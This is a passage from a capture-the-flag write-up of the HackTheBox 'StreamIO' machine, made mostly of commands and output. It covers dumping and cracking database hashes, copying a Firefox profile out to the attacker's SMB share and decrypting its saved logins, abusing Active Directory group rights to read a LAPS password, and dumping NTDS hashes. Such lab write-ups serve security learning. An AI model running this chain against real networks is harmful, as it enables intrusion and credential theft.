Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
        Sep 24 2019 13:48:23
        Copyright (C) 2019 Microsoft Corporation
        Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)

(1 rows affected)
```

```powershell
PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_admin -P 'B1@hx31234567890' -Q "use streamio_backup"
Changed database context to 'streamio_backup'.

PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_admin -P 'B1@hx31234567890' -Q "SELECT table_name FROM streamio_backup.INFORMATION_SCHEMA.TABLES"
table_name
----------------------------------------------------------------------------------------
movies
users

PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_admin -P 'B1@hx31234567890' -d 'streamio_backup' -Q "select * from users"
id          username                                           password
----------- -------------------------------------------------- -------------------------
          1 nikk37                                             389d14cb8e4e9b94b137deb1caf0612a
          2 yoshihide                                          b779ba15cedfd22a023c4d8bcf5f2332
          3 James                                              c660060492d9edcaa8332d89c99c9239
          4 Theodore                                           925e5408ecb67aea449373d668b7359e
          5 Samantha                                           083ffae904143c4796e464dac33c1f7d
          6 Lauren                                             08344b85b329d7efd611b7a7743e8a09
          7 William                                            d62be0dc82071bccc1322d64ec5b6c51
          8 Sabrina                                            f87d3c0d6c8fd686aacc6627f1f493a5
```

Shorten our user list by checking which of these usernames actually exist in the domain.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ kerbrute userenum --dc $ip -d StreamIO.htb -t 100 -o users.list ./backup_users

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

2024/07/09 03:41:07 >  [+] VALID USERNAME:       yoshihide@StreamIO.htb
2024/07/09 03:41:07 >  [+] VALID USERNAME:       nikk37@StreamIO.htb
```

Only one hash was cracked, so it must belong to one of the two valid users.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat -m 0 backup_hashes /usr/share/wordlists/rockyou.txt

389d14cb8e4e9b94b137deb1caf0612a:get_dem_girls2xxxxxxxxxxxx 
```

Confirm the credentials:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u 'nikk37'  -p 'get_dem_girls2xxxxxxxxx' 

SMB    10.10.11.158    445    DC    [+] streamIO.htb\nikk37:get_dem_girls2xxxxxxxxx
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ evil-winrm -i $ip -u nikk37 -p 'get_dem_girls2xxxxxxxxxx'

*Evil-WinRM* PS C:\Users\nikk37\Documents> type ..\Desktop\user.txt
a00c4e521d2bed26c166xxxxxxxxxxxxx
```

> User Flag: a00c4e521d2bed26c166xxxxxxxxxxxxx

***

## Privilege Escalation

I found that `Mozilla Firefox` is installed on the system, so I looked at the user's Mozilla profile and copied it to my Kali machine to try to decrypt the Firefox secrets and cookies.

Start an SMB server:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ smbserver
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```

```powershell
*Evil-WinRM* PS C:\Users\nikk37> net use z: \\10.10.16.3\share /user:blind0bandit blind0bandit
The command completed successfully. 

*Evil-WinRM* PS C:\Users\nikk37> copy -r AppData\Roaming\Mozilla\FireFox\Profiles\br53rxeg.default-release\ z:
```

I changed directory to the profile folder I copied from the Windows box and started `firepwd.py` to decrypt the Firefox secrets.

{% embed url="<https://github.com/lclevy/firepwd>" %}

```bash
┌──(kali㉿kali)-[~/…/HTB/machines/StreamIO/br53rxeg.default-release]
└─$ python3 /opt/firepwd/firepwd.py

<snip>
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
```

I found some credentials; let's spray them against the domain accounts.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u fire_users -p admin_passwords 

<snip>
SMB    10.10.11.158    445    DC    [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r
```

* I fired up BloodHound to see what the user `JDgodd` can do and found the following:
  * `JDgodd` has `WriteOwner` over the `CORE STAFF` group, which lets us take ownership of the group, grant ourselves rights on it and then add ourselves to it
  * `CORE STAFF` has the right to read the `LAPS` password (the `ms-Mcs-AdmPwd` attribute) of the `DC` computer object

<figure><img src="/files/ZzCbLDHlIpg5f2677FuM" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/vA014iedjss8F3eCPOXT" alt=""><figcaption></figcaption></figure>

We can abuse this chain with PowerView from the `nikk37` shell (after uploading `PowerView.ps1` with evil-winrm's `upload` command), authenticating as `JDgodd` with the password recovered from the Firefox profile. `WriteOwner` alone does not let us touch the group's members, so we first take ownership, then grant ourselves rights on the object, and only then add ourselves:

```powershell
. .\PowerView.ps1   # PowerView must already be uploaded to the session (path assumed)
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('STREAMIO.HTB\JDGodd', $SecPassword)
Set-DomainObjectOwner -Credential $Cred -Identity "Core Staff" -OwnerIdentity "JDgodd"   # WriteOwner: become the group's owner first
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -PrincipalIdentity "streamio\JDgodd" -Rights All   # as owner, grant ourselves full rights
Add-DomainGroupMember -Credential $Cred -Identity "Core Staff" -Members "StreamIO\JDgodd"   # now we can add ourselves to the group
```

I personally use `crackmapexec` to pull the LAPS password:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u 'JDGodd'  -p 'JDg0dd1s@d0p3cr3@t0r' --laps 

SMB  10.10.11.158  445  DC   [-] DC\administrator:G58E)u0@)96rU1 STATUS_LOGON_FAILURE 
```

Despite the `[-]` and `STATUS_LOGON_FAILURE`, the LAPS password was read successfully: crackmapexec then tries it as a local logon (`DC\administrator`), which fails here, but the password works for the domain Administrator, as the `psexec` and `--ntds` steps below show. An alternative from the community is to read the `ms-Mcs-AdmPwd` attribute directly with `ldapsearch`:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ldapsearch -H ldap://10.10.11.158 -b 'DC=streamIO,DC=htb' -x -D JDgodd@streamio.htb -w 'JDg0dd1s@d0p3cr3@t0r' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

<snip>
dn: CN=DC,OU=Domain Controllers,DC=streamIO,DC=htb
ms-Mcs-AdmPwd: G58E)u0@)96rU1
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ impacket-psexec streamio.htb/administrator@$ip
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:

<snip>
C:\Windows\system32> type C:\Users\Martin\Desktop\root.txt              
fcca05f1388d18d964521ce53582793
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u administrator -p 'G58E)u0@)96rU1' --ntds    
SMB         10.10.11.158    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.158    445    DC               [+] streamIO.htb\administrator:G58E)u0@)96rU1 (Pwn3d!)
SMB         10.10.11.158    445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.11.158    445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:63ab0c9344ca0c42ce367de76cafec16:::
SMB         10.10.11.158    445    DC               Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.158    445    DC               krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5f5142aae3cce656285ce4504605dec1:::
SMB         10.10.11.158    445    DC               JDgodd:1104:aad3b435b51404eeaad3b435b51404ee:8846130392c4169cb552fe5b73b046af:::
SMB         10.10.11.158    445    DC               Martin:1105:aad3b435b51404eeaad3b435b51404ee:a9347432fb0034dd1814ca794793d377:::
SMB         10.10.11.158    445    DC               nikk37:1106:aad3b435b51404eeaad3b435b51404ee:17a54d09dd09920420a6cb9b78534764:::
SMB         10.10.11.158    445    DC               yoshihide:1107:aad3b435b51404eeaad3b435b51404ee:6d21f46be3697ba16b6edef7b3399bf4:::
SMB         10.10.11.158    445    DC               DC$:1000:aad3b435b51404eeaad3b435b51404ee:8f92fd746817af09faa8257dfc127736:::
SMB         10.10.11.158    445    DC               [+] Dumped 8 NTDS hashes to /home/kali/.cme/logs/DC_10.10.11.158_2024-07-09_083839.ntds of which 7 were added to the database
```
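The `--ntds` output is the classic pwdump format `user:rid:LM:NT:::`, and it is worth triaging before spending GPU time on it. The following Python is an added example, not part of crackmapexec or impacket: it skips past crackmapexec's `SMB <ip> 445 DC` prefix, parses each record, and flags blank NT hashes (the empty-password hash `31d6cfe0d16ae931b73c59d7e0c089c0`), any account whose LM field is not the empty-LM constant `aad3b435b51404eeaad3b435b51404ee`, machine accounts, and NT hashes shared by more than one account (password reuse). The first sample is the dump above; the second is a constructed three-line dump with made-up hashes so the reuse check has something to find.

```python
"""Triage a pwdump-style NTDS dump before cracking it.

Added example for this write-up; not part of crackmapexec or impacket.
Each record is `user:rid:LM:NT:::`; crackmapexec prefixes its own
`SMB <ip> 445 <host>` columns, which the regex search simply skips past.
"""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": LM disabled / not stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": account has a blank password

RECORD_RE = re.compile(
    r"(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::",
    re.IGNORECASE,
)

# Sample 1: the dump printed by `crackmapexec ... --ntds` above (banner lines included).
SAMPLE = """\
SMB  10.10.11.158  445  DC  [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB  10.10.11.158  445  DC  [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB  10.10.11.158  445  DC  Administrator:500:aad3b435b51404eeaad3b435b51404ee:63ab0c9344ca0c42ce367de76cafec16:::
SMB  10.10.11.158  445  DC  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB  10.10.11.158  445  DC  krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5f5142aae3cce656285ce4504605dec1:::
SMB  10.10.11.158  445  DC  JDgodd:1104:aad3b435b51404eeaad3b435b51404ee:8846130392c4169cb552fe5b73b046af:::
SMB  10.10.11.158  445  DC  Martin:1105:aad3b435b51404eeaad3b435b51404ee:a9347432fb0034dd1814ca794793d377:::
SMB  10.10.11.158  445  DC  nikk37:1106:aad3b435b51404eeaad3b435b51404ee:17a54d09dd09920420a6cb9b78534764:::
SMB  10.10.11.158  445  DC  yoshihide:1107:aad3b435b51404eeaad3b435b51404ee:6d21f46be3697ba16b6edef7b3399bf4:::
SMB  10.10.11.158  445  DC  DC$:1000:aad3b435b51404eeaad3b435b51404ee:8f92fd746817af09faa8257dfc127736:::
SMB  10.10.11.158  445  DC  [+] Dumped 8 NTDS hashes to /home/kali/.cme/logs/DC_10.10.11.158_2024-07-09_083839.ntds of which 7 were added to the database
"""

# Sample 2: constructed, with made-up hashes, to show the reuse check firing.
REUSE_SAMPLE = """\
alice:2001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
bob:2002:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
carol:2003:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
"""


def parse_dump(text):
    """Return one dict per record: user, rid (int), lm and nt (lower-case hex)."""
    records = []
    for line in text.splitlines():
        m = RECORD_RE.search(line)  # search, not match: tolerates the cme prefix
        if m:
            records.append({"user": m["user"], "rid": int(m["rid"]),
                            "lm": m["lm"].lower(), "nt": m["nt"].lower()})
    return records


def triage(records):
    """Flag blank passwords, stored LM hashes, machine accounts and NT-hash reuse."""
    by_nt = defaultdict(list)
    for r in records:
        if r["nt"] != EMPTY_NT:  # blank passwords are reported on their own
            by_nt[r["nt"]].append(r["user"])
    return {
        "blank_nt": [r["user"] for r in records if r["nt"] == EMPTY_NT],
        "lm_present": [r["user"] for r in records if r["lm"] != EMPTY_LM],
        "machine_accounts": [r["user"] for r in records if r["user"].endswith("$")],
        "reused_nt": {nt: users for nt, users in by_nt.items() if len(users) > 1},
    }


if __name__ == "__main__":
    for name, text in (("page dump", SAMPLE), ("constructed reuse dump", REUSE_SAMPLE)):
        print(name)
        for key, value in triage(parse_dump(text)).items():
            print(f"  {key}: {value}")
```

On this box the only finding is the disabled `Guest` account's blank NT hash and no reuse between the seven remaining hashes; on a real engagement the `reused_nt` groups are the first thing to crack, since one recovered password then opens every account in the group.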

> Root Flag: fcca05f1388d18d964521ce53582793